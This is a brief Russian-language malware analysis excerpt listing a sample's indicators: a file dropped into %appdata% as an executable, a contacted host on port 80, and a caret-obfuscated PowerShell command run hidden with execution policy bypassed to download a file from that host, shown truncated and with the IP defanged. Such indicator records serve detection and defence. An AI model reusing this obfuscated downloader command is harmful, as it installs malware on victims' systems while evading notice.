Техническая информация
- http://10#.#93.226.113/11.mov как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POwE^rShelL.E^XE^ -E^XeCuT^ion^POLIC^Y^ ^bypAss -^nO^p^r^O^f^iL^e -W^iNdO^wStyl^e HId^D^E^n^ (NEW-O^B^jecT ^S^ySTem.NeT^.weB^CL^IENT).downl^O^ADfILE^('http://10#.#93.226.113/11...
- '10#.#93.226.113':80
- '<SYSTEM32>\cmd.exe' /C "POwE^rShelL.E^XE^ -E^XeCuT^ion^POLIC^Y^ ^bypAss -^nO^p^r^O^f^iL^e -W^iNdO^wStyl^e HId^D^E^n^ (NEW-O^B^jecT ^S^ySTem.NeT^.weB^CL^IENT).downl^O^ADfILE^('http://10#.#93.226.113/11...' (со скрытым окном)